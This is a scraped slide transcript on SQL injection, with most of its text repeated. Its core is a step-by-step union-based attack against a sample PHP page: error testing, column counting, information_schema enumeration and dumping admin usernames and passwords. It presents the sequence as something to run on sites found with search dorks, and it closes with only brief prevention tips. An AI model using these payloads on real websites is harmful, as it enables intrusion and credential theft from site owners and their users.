CLICK HERE TO DOWNLOAD PPT ON SQL Injection
SQL Injection Presentation Transcript
1.SQL Injection
2.What is SQL Injection?
A SQL injection is often used to attack the security of a website by inputting SQL statements in a web form to get a badly designed website in order to dump the database content to the attacker
A SQL injection is often used to attack the security of a website by inputting SQL statements in a web form to get a badly designed website in order to dump the database content to the attacker
3.Real World Examples
On August 17, 2009, the United States Justice Department charged an American citizen Albert Gonzalez and two unnamed Russians with the theft of 130 million credit card numbers using an SQL injection attack.
In 2008 a sweep of attacks began exploiting the SQL injection vulnerabilities of Microsoft's IIS web server and SQL database server. Over 500,000 sites were exploited.
On August 17, 2009, the United States Justice Department charged an American citizen Albert Gonzalez and two unnamed Russians with the theft of 130 million credit card numbers using an SQL injection attack.
In 2008 a sweep of attacks began exploiting the SQL injection vulnerabilities of Microsoft's IIS web server and SQL database server. Over 500,000 sites were exploited.
4.Important Syntax
5.Google dorks to find Sql vulnerable website
6. Php Based Sql Injection
After finding website link we have to start sql injection attack on the website.
http://www.website.com/photo-category.php?id=11' (Test Whether the site is Vulnerable or not .If Vulnerable error will be displayed or blank page)
After that http://www.website.com/photo-category.php?id=11 order by 1-- (find the number of columns in the database .If no error is displayed proceed until you get an error page or a blank page)
After finding website link we have to start sql injection attack on the website.
http://www.website.com/photo-category.php?id=11' (Test Whether the site is Vulnerable or not .If Vulnerable error will be displayed or blank page)
After that http://www.website.com/photo-category.php?id=11 order by 1-- (find the number of columns in the database .If no error is displayed proceed until you get an error page or a blank page)
7.Php Based Sql Injection
Checking for error page
http://www.website.com/photo-category.php?id=11 order by 2-- ( No Error Page) http://www.website.com/photo-category.php?id=11 order by 3-- ( No Error Page) http://www.website.com/photo-category.php?id=11 order by 4-- ( No Error Page) http://www.website.com/photo-category.php?id=11 order by 5-- (No Error Page) http://www.website.com/photo-category.php?id=11 order by 6-- (Error Page. This means that there are 5 columns)
Checking for error page
http://www.website.com/photo-category.php?id=11 order by 2-- ( No Error Page) http://www.website.com/photo-category.php?id=11 order by 3-- ( No Error Page) http://www.website.com/photo-category.php?id=11 order by 4-- ( No Error Page) http://www.website.com/photo-category.php?id=11 order by 5-- (No Error Page) http://www.website.com/photo-category.php?id=11 order by 6-- (Error Page. This means that there are 5 columns)
8.http://www.website.com/photo-category.php?id=11 union all select 1,2,3,4,5-- (will display a vulnerable column in the page.eg. lets take 4 as the vulnerable. Note: if nothing happened use a "-" ie ?id=-11. ) or http://www.website.com/photo-category.php?id=-11 union all select 1,2,3,4,5-- http://www.website.com/photo-category.php?id=11 union all select 1,2,3,group_concat(table_name),5 from information_schema.tables-- (Replace 4 to table_name , this is will dispaly all the tables ,select a table of users or admin .eg admin)
9.http://www.website.com/photo-category.php?id=11 union all select 1,2,3,group_concat(column_name),5 from information_schema.columns where table_name='admin'-- (This will display the column of admin table eg. username , password) http://www.website.com/photo-category.php?id=11 union all select 1,2,3,group_concat(username,0x3a,user_password),5 from admin-- (display the username and password)
10. Tools used for Finding login page
11.Sql injection with tools
12.Blind Sql injection
Blind SQL Injection is used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker.
The page with the vulnerability may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page.
Blind SQL Injection is used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker.
The page with the vulnerability may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page.
13. Example of blind Sql injection
14.Example of Blind Sql injection
15.Prevention
Logic to allow only numbers / letters in username and password.
How should you enforce the constraint? SERVER SIDE.
‘ESCAPE’ bad characters. ’ becomes ’
READ ONLY database access.
Remember this is NOT just for login areas! NOT just for websites!!
Logic to allow only numbers / letters in username and password.
How should you enforce the constraint? SERVER SIDE.
‘ESCAPE’ bad characters. ’ becomes ’
READ ONLY database access.
Remember this is NOT just for login areas! NOT just for websites!!
16. Works Cited
(SQL Injection Walkthrough)(SQL Injection)(SQL Injection)
Friedl, S. (2009, 10 26). SQL Injection Attacks by Example. Retrieved from Steve Friedl's Unixwiz.net Tech Tips: http://unixwiz.net/techtips/sql-injection.html
IBM Informix Guide to SQL: Syntax. (n.d.). Retrieved 10 26, 2009, from IBM.COM: http://publib.boulder.ibm.com/infocenter/idshelp/v10/index.jsp?topic=/com.ibm.sqls.doc/sqls36.htm
SQL Injection. (n.d.). Retrieved 10 26, 2009, from SQL Server 2008 Books Online: http://msdn.microsoft.com/en-us/library/ms161953.aspx
SQL Injection. (n.d.). Retrieved 10 26, 2009, from php.net: http://php.net/manual/en/security.database.sql-injection.php
SQL Injection Walkthrough. (n.d.). Retrieved 10 26, 2009, from Securiteam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
(SQL Injection Walkthrough)(SQL Injection)(SQL Injection)
Friedl, S. (2009, 10 26). SQL Injection Attacks by Example. Retrieved from Steve Friedl's Unixwiz.net Tech Tips: http://unixwiz.net/techtips/sql-injection.html
IBM Informix Guide to SQL: Syntax. (n.d.). Retrieved 10 26, 2009, from IBM.COM: http://publib.boulder.ibm.com/infocenter/idshelp/v10/index.jsp?topic=/com.ibm.sqls.doc/sqls36.htm
SQL Injection. (n.d.). Retrieved 10 26, 2009, from SQL Server 2008 Books Online: http://msdn.microsoft.com/en-us/library/ms161953.aspx
SQL Injection. (n.d.). Retrieved 10 26, 2009, from php.net: http://php.net/manual/en/security.database.sql-injection.php
SQL Injection Walkthrough. (n.d.). Retrieved 10 26, 2009, from Securiteam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
Posts
0 comments